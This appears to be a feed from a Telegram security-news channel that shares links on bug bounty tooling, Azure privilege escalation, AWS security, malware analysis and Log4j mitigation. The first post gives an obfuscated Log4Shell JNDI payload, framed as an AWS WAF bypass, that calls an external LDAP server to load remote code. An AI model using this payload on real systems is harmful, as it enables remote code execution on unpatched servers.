⭕️ Previous AWS WAF bypass is patched.. here is another:
@securation
${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o}
#jndi #log4j #exploit #bypass@securation
⭕️ مجموعه ای از wordlists و دستوراتی برای FFUF و template هایی برای nuclei که در بایپس ارور های 403 بکار برده میشه رو اینجا میتونید استفاده کنید.
https://github.com/aufzayed/bugbounty/tree/main/403-bypass
#bugbounty #cybersecurity #infosec #wordlists #403bypass #hack #ffuf #fuzzing #web
@securation
https://github.com/aufzayed/bugbounty/tree/main/403-bypass
#bugbounty #cybersecurity #infosec #wordlists #403bypass #hack #ffuf #fuzzing #web
@securation
GitHub
bugbounty/403-bypass at main · aufzayed/bugbounty
Bugbounty Resources. Contribute to aufzayed/bugbounty development by creating an account on GitHub.
👍1
⭕️Azure Privilege Escalation via Azure API Permissions Abuse
How Azure API Permissions can be abused to escalate to Global Admin.
https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48
#azure #cloud #privsec
@securation
How Azure API Permissions can be abused to escalate to Global Admin.
https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48
#azure #cloud #privsec
@securation
⭕️ List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
https://github.com/toniblyx/my-arsenal-of-aws-security-tools/
#security #audit #AWS
@securation
https://github.com/toniblyx/my-arsenal-of-aws-security-tools/
#security #audit #AWS
@securation
GitHub
GitHub - toniblyx/my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing…
List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc. - toniblyx/my-arsenal-of-aws-security-tools
In this video I would like to showcase another challenge from Snyk capture the flag event that was going on from October 5th to October 7th of 2021. My video showcase #premieres at 9:00 PM IRST (12 PM EST)
https://youtu.be/xCdqK84bngg
https://youtu.be/xCdqK84bngg
YouTube
Steganography Challenges (2/4)
This is the second episode of the Steganography challenges video series.In this video I would like to showcase another challenge from SNYK capture the flag e...
⭕️ نسخه جدید systemd منتشر شد.
تغییرات خیلی خوبی در زمینه امنیت داشته پشتیبانی از credentialهای رمزنگاری شده و authenticated .
هماهنگی بیشتر با پارتیشن های رمز شده و پشتیبانی از TPM2/FIDO2/PKCS11 .
استفاده از libgcrypt به جای OpenSSL .
امکان محدود سازی Network Interface ها و محدود کردن FileSystems سرویس ها با BPF LSM
توضیحات بیشتر رو اینجا بخونید :
https://github.com/systemd/systemd/releases/tag/v250
#systemd #security #hardening
@securation
تغییرات خیلی خوبی در زمینه امنیت داشته پشتیبانی از credentialهای رمزنگاری شده و authenticated .
هماهنگی بیشتر با پارتیشن های رمز شده و پشتیبانی از TPM2/FIDO2/PKCS11 .
استفاده از libgcrypt به جای OpenSSL .
امکان محدود سازی Network Interface ها و محدود کردن FileSystems سرویس ها با BPF LSM
توضیحات بیشتر رو اینجا بخونید :
https://github.com/systemd/systemd/releases/tag/v250
#systemd #security #hardening
@securation
GitHub
systemd
System and Service Manager. systemd has 34 repositories available. Follow their code on GitHub.
⭕️ IoT Malware Similarity Analysis Platform
https://umay.xyz/
https://github.com/mucoze/Umay
#IOT #Malware #platform
@securation
https://umay.xyz/
https://github.com/mucoze/Umay
#IOT #Malware #platform
@securation
GitHub
GitHub - mucoze/Umay: IoT Malware Similarity Analysis Platform
IoT Malware Similarity Analysis Platform. Contribute to mucoze/Umay development by creating an account on GitHub.
⭕️ Azure-Red-Team: Azure Security Resources and Notes
https://github.com/rootsecdev/Azure-Red-Team
#infosec #pentest #redteam
@securation
https://github.com/rootsecdev/Azure-Red-Team
#infosec #pentest #redteam
@securation
GitHub
GitHub - rootsecdev/Azure-Red-Team: Azure Security Resources and Notes
Azure Security Resources and Notes. Contribute to rootsecdev/Azure-Red-Team development by creating an account on GitHub.
⭕️Introduction to Malware Analysis and Reverse Engineering
https://class.malware.re
Well-organized entry-level content for Static Analysis of Java applications, Malware Analysis and Reverse Engineering.
#cybersecurity #malware #android #bugbounty
@securation
https://class.malware.re
Well-organized entry-level content for Static Analysis of Java applications, Malware Analysis and Reverse Engineering.
#cybersecurity #malware #android #bugbounty
@securation
⭕️ Using AWS security services to protect against, detect, and respond to the Log4j vulnerability
Post providing guidance to help customers who are responding to the recently disclosed log4j vulnerability.
https://aws.amazon.com/ru/blogs/security/using-aws-security-services-to-protect-against-detect-and-respond-to-the-log4j-vulnerability/
#aws #security #log4shell #log4j
@securation
Post providing guidance to help customers who are responding to the recently disclosed log4j vulnerability.
https://aws.amazon.com/ru/blogs/security/using-aws-security-services-to-protect-against-detect-and-respond-to-the-log4j-vulnerability/
#aws #security #log4shell #log4j
@securation
Amazon
Using AWS security services to protect against, detect, and respond to the Log4j vulnerability | Amazon Web Services
April 21, 2022: The blog post has been updated to include information on the updated version of the hotpatch. See this security advisory for more details. Overview In this post we will provide guidance to help customers who are responding to the recently…
👍7❤5👎2🤩1
⭕️ A Memory Visualiser Tool for iOS Security Research
In this post I want to share a recent project of mine — a memory visualiser tool for iOS security researchers.
- Live Memory Monitoring
- Visual Block Creation
- Contextual Typing
https://bellis1000.medium.com/a-memory-visualiser-tool-for-ios-security-research-bd8bb8c334c6
#ios #memory #security
@securation
In this post I want to share a recent project of mine — a memory visualiser tool for iOS security researchers.
- Live Memory Monitoring
- Visual Block Creation
- Contextual Typing
https://bellis1000.medium.com/a-memory-visualiser-tool-for-ios-security-research-bd8bb8c334c6
#ios #memory #security
@securation
👍3👎2🔥2